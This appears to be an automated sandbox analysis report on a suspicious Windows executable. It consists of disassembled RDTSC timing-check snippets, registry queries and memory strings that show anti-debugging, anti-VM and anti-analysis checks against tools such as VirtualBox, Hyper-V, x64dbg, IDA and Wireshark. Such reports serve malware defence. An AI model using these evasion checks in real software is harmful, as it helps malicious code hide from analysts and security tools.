Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70249 second address: 6F702D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [761C06ECh] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F5BD0C7BA74h 0x00000018 adc esi, 2BB5D808h 0x0000001e jmp 00007F5BD0C7BA6Bh 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F5BD0C7BA78h 0x0000002a sub cx, FA68h 0x0000002f jmp 00007F5BD0C7BA6Bh 0x00000034 popfd 0x00000035 popad 0x00000036 test esi, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov ecx, edx 0x0000003d call 00007F5BD0C7BA77h 0x00000042 pop eax 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F702D3 second address: 6F7031A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5BD0FFF0D4h 0x00000008 pop ecx 0x00000009 mov cx, di 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007F5BD0FFFF18h 0x00000015 pushad 0x00000016 movsx edi, si 0x00000019 jmp 00007F5BD0FFF0D4h 0x0000001e popad 0x0000001f xchg eax, edi 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov ah, dl 0x00000025 mov dx, ax 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7031A second address: 6F7032C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BD0C7BA6Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7032C second address: 6F70330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70330 second address: 6F7039D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5BD0C7BA6Eh 0x0000000e xchg eax, edi 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F5BD0C7BA6Eh 0x00000016 xor cx, F648h 0x0000001b jmp 00007F5BD0C7BA6Bh 0x00000020 popfd 0x00000021 mov ah, 69h 0x00000023 popad 0x00000024 call dword ptr [76190B60h] 0x0000002a mov eax, 758CD620h 0x0000002f ret 0x00000030 pushad 0x00000031 mov cl, bl 0x00000033 popad 0x00000034 push 00000044h 0x00000036 jmp 00007F5BD0C7BA74h 0x0000003b pop edi 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f call 00007F5BD0C7BA6Ch 0x00000044 pop ecx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7039D second address: 6F703B0 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov cx, D223h 0x0000000b popad 0x0000000c xchg eax, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F703B0 second address: 6F703B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F703B6 second address: 6F703E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5BD0FFF0CBh 0x0000000f xchg eax, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5BD0FFF0D0h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F703E5 second address: 6F703EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F703EB second address: 6F703F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F703F0 second address: 6F703F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F703F6 second address: 6F70434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push dword ptr [eax] 0x00000009 jmp 00007F5BD0FFF0D6h 0x0000000e mov eax, dword ptr fs:[00000030h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F5BD0FFF0D7h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70434 second address: 6F70461 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F5BD0C7BA75h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push dword ptr [eax+18h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5BD0C7BA6Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F704DE second address: 6F70526 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5BD0FFF0CDh 0x00000012 or ax, 7126h 0x00000017 jmp 00007F5BD0FFF0D1h 0x0000001c popfd 0x0000001d mov edx, esi 0x0000001f popad 0x00000020 mov dword ptr [esi], edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70526 second address: 6F7052A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7052A second address: 6F7052E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7052E second address: 6F70534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70534 second address: 6F705B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BD0FFF0D8h 0x00000009 sbb cx, F528h 0x0000000e jmp 00007F5BD0FFF0CBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esi+04h], eax 0x0000001a pushad 0x0000001b mov cl, 69h 0x0000001d push edi 0x0000001e movzx esi, dx 0x00000021 pop ebx 0x00000022 popad 0x00000023 mov dword ptr [esi+08h], eax 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F5BD0FFF0D2h 0x0000002d and esi, 0ECB82B8h 0x00000033 jmp 00007F5BD0FFF0CBh 0x00000038 popfd 0x00000039 call 00007F5BD0FFF0D8h 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F705B3 second address: 6F70655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esi+0Ch], eax 0x00000009 pushad 0x0000000a call 00007F5BD0C7BA6Dh 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 mov ax, dx 0x00000015 popad 0x00000016 mov eax, dword ptr [ebx+4Ch] 0x00000019 jmp 00007F5BD0C7BA79h 0x0000001e mov dword ptr [esi+10h], eax 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F5BD0C7BA6Ch 0x00000028 sbb ax, 41D8h 0x0000002d jmp 00007F5BD0C7BA6Bh 0x00000032 popfd 0x00000033 popad 0x00000034 mov eax, dword ptr [ebx+50h] 0x00000037 jmp 00007F5BD0C7BA75h 0x0000003c mov dword ptr [esi+14h], eax 0x0000003f jmp 00007F5BD0C7BA6Eh 0x00000044 mov eax, dword ptr [ebx+54h] 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F5BD0C7BA77h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70655 second address: 6F7065B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7065B second address: 6F7065F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7065F second address: 6F70676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+18h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5BD0FFF0CAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70676 second address: 6F70708 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5BD0C7BA74h 0x00000013 add si, 8B58h 0x00000018 jmp 00007F5BD0C7BA6Bh 0x0000001d popfd 0x0000001e popad 0x0000001f mov dword ptr [esi+1Ch], eax 0x00000022 jmp 00007F5BD0C7BA75h 0x00000027 mov eax, dword ptr [ebx+5Ch] 0x0000002a jmp 00007F5BD0C7BA6Eh 0x0000002f mov dword ptr [esi+20h], eax 0x00000032 jmp 00007F5BD0C7BA70h 0x00000037 mov eax, dword ptr [ebx+60h] 0x0000003a jmp 00007F5BD0C7BA70h 0x0000003f mov dword ptr [esi+24h], eax 0x00000042 pushad 0x00000043 mov edx, eax 0x00000045 push esi 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70708 second address: 6F70717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [ebx+64h] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70717 second address: 6F7071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7071B second address: 6F7071F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7071F second address: 6F70725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70725 second address: 6F7072B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7072B second address: 6F7072F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7072F second address: 6F7074F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+28h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5BD0FFF0D3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7074F second address: 6F707E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BD0C7BA6Fh 0x00000009 sbb ch, FFFFFF9Eh 0x0000000c jmp 00007F5BD0C7BA79h 0x00000011 popfd 0x00000012 mov ecx, 33E34F67h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+68h] 0x0000001d pushad 0x0000001e mov esi, 5480C45Fh 0x00000023 mov esi, 4097477Bh 0x00000028 popad 0x00000029 mov dword ptr [esi+2Ch], eax 0x0000002c pushad 0x0000002d jmp 00007F5BD0C7BA6Ch 0x00000032 pushfd 0x00000033 jmp 00007F5BD0C7BA72h 0x00000038 add ax, 43F8h 0x0000003d jmp 00007F5BD0C7BA6Bh 0x00000042 popfd 0x00000043 popad 0x00000044 mov ax, word ptr [ebx+6Ch] 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F5BD0C7BA70h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F707E3 second address: 6F707E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F00638 second address: 6F0063E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F0063E second address: 6F0067D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F5BD0FFF0D0h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5BD0FFF0CAh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F0067D second address: 6F0068C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F0068C second address: 6F00696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 2B70BC7Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F509D6 second address: 6F509FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5BD0C7BA75h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F509FF second address: 6F50A25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5BD0FFF0CDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F50A25 second address: 6F50A2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F50A2C second address: 6F50A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F50A39 second address: 6F50A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F50A40 second address: 6F50A46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F50A46 second address: 6F50A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F50A4A second address: 6F50A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F3007B second address: 6F30122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 44h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5BD0C7BA6Eh 0x00000013 sbb ah, 00000058h 0x00000016 jmp 00007F5BD0C7BA6Bh 0x0000001b popfd 0x0000001c mov edi, eax 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 jmp 00007F5BD0C7BA72h 0x00000025 push eax 0x00000026 pushad 0x00000027 mov si, di 0x0000002a pushad 0x0000002b mov edx, 083797CEh 0x00000030 popad 0x00000031 popad 0x00000032 xchg eax, ebx 0x00000033 jmp 00007F5BD0C7BA70h 0x00000038 xchg eax, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c jmp 00007F5BD0C7BA6Dh 0x00000041 pushfd 0x00000042 jmp 00007F5BD0C7BA70h 0x00000047 jmp 00007F5BD0C7BA75h 0x0000004c popfd 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F30122 second address: 6F30128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F30128 second address: 6F3013D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ebx, 6CC52416h 0x00000011 mov ax, di 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F3013D second address: 6F30160 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movzx ecx, bx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F30160 second address: 6F30190 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a mov dl, 8Ah 0x0000000c pop esi 0x0000000d popad 0x0000000e push esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5BD0C7BA6Bh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F30190 second address: 6F301C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c pushad 0x0000000d pushad 0x0000000e mov bh, cl 0x00000010 jmp 00007F5BD0FFF0CFh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F301C8 second address: 6F301CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F301CC second address: 6F301ED instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov edi, dword ptr [ebp+08h] 0x0000000a pushad 0x0000000b mov ebx, esi 0x0000000d mov esi, 3E253EFFh 0x00000012 popad 0x00000013 mov dword ptr [esp+24h], 00000000h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F301ED second address: 6F301F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F301F1 second address: 6F301F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F301F7 second address: 6F30258 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock bts dword ptr [edi], 00000000h 0x0000000e pushad 0x0000000f jmp 00007F5BD0C7BA6Eh 0x00000014 call 00007F5BD0C7BA72h 0x00000019 call 00007F5BD0C7BA72h 0x0000001e pop eax 0x0000001f pop edi 0x00000020 popad 0x00000021 jc 00007F5C412ADBBDh 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F30258 second address: 6F3025C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F3025C second address: 6F30262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F60213 second address: 6F6021A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, C8h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F6021A second address: 6F6024A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F5BD0C7BA76h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5BD0C7BA6Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F6024A second address: 6F6024E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F6024E second address: 6F60254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Special instruction interceptor: First address: 90E16E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_003A9980 rdtsc 0_2_003A9980
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_001C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_001C255D
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_001C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_001C29FF
Source: XJiB3BdLTg.exe, XJiB3BdLTg.exe, 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: XJiB3BdLTg.exe, 00000000.00000003.1553812884.0000000001633000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
Source: XJiB3BdLTg.exe | Binary or memory string: Hyper-V RAW
Source: XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: XJiB3BdLTg.exe, 00000000.00000003.1555630032.00000000067D1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=
Source: XJiB3BdLTg.exe, 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
